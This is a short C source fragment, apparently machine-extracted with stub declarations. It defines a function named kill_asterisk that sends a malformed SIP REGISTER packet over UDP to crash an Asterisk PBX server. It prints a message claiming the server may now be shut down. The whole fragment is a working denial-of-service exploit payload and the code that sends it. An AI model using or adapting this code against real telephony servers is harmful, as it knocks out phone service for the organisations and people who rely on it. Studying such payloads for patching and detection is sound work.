
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct udp_session {int saddr; int sd; } ;
struct sockaddr {int dummy; } ;


 int printf (char*) ;
 int sendto (int ,char*,int ,int ,struct sockaddr*,int) ;
 int strlen (char*) ;

void kill_asterisk(struct udp_session *sess)
{
 int ret;
 char *p =
  "REGISTER              \r\n"
  "Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n"
  "Max-Forwards: 70\r\n"
  "From: <sip:666@192.168.204.130>;tag=as253946cf\r\n"
  "To: <sip:100@192.168.204.130>\r\n"
  "Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n"
  "CSeq: 104 REGISTER\r\n"
  "User-Agent: Asterisk PBX\r\n"
  "Expires: 120\r\n"
  "Contact: <sip:666@192.168.204.130>\r\n"
  "Event: registration\r\n"
  "Content-Length: 0\r\n";

 ret = sendto(sess->sd, p, strlen(p), 0,
        (struct sockaddr *)&sess->saddr,
        sizeof(struct sockaddr));

 if (ret) {
  printf("You may have well shutdown a asterisk server\n");
 } else {
  printf("there was a issue sending the request\n");
  return;
 }
 return;
}
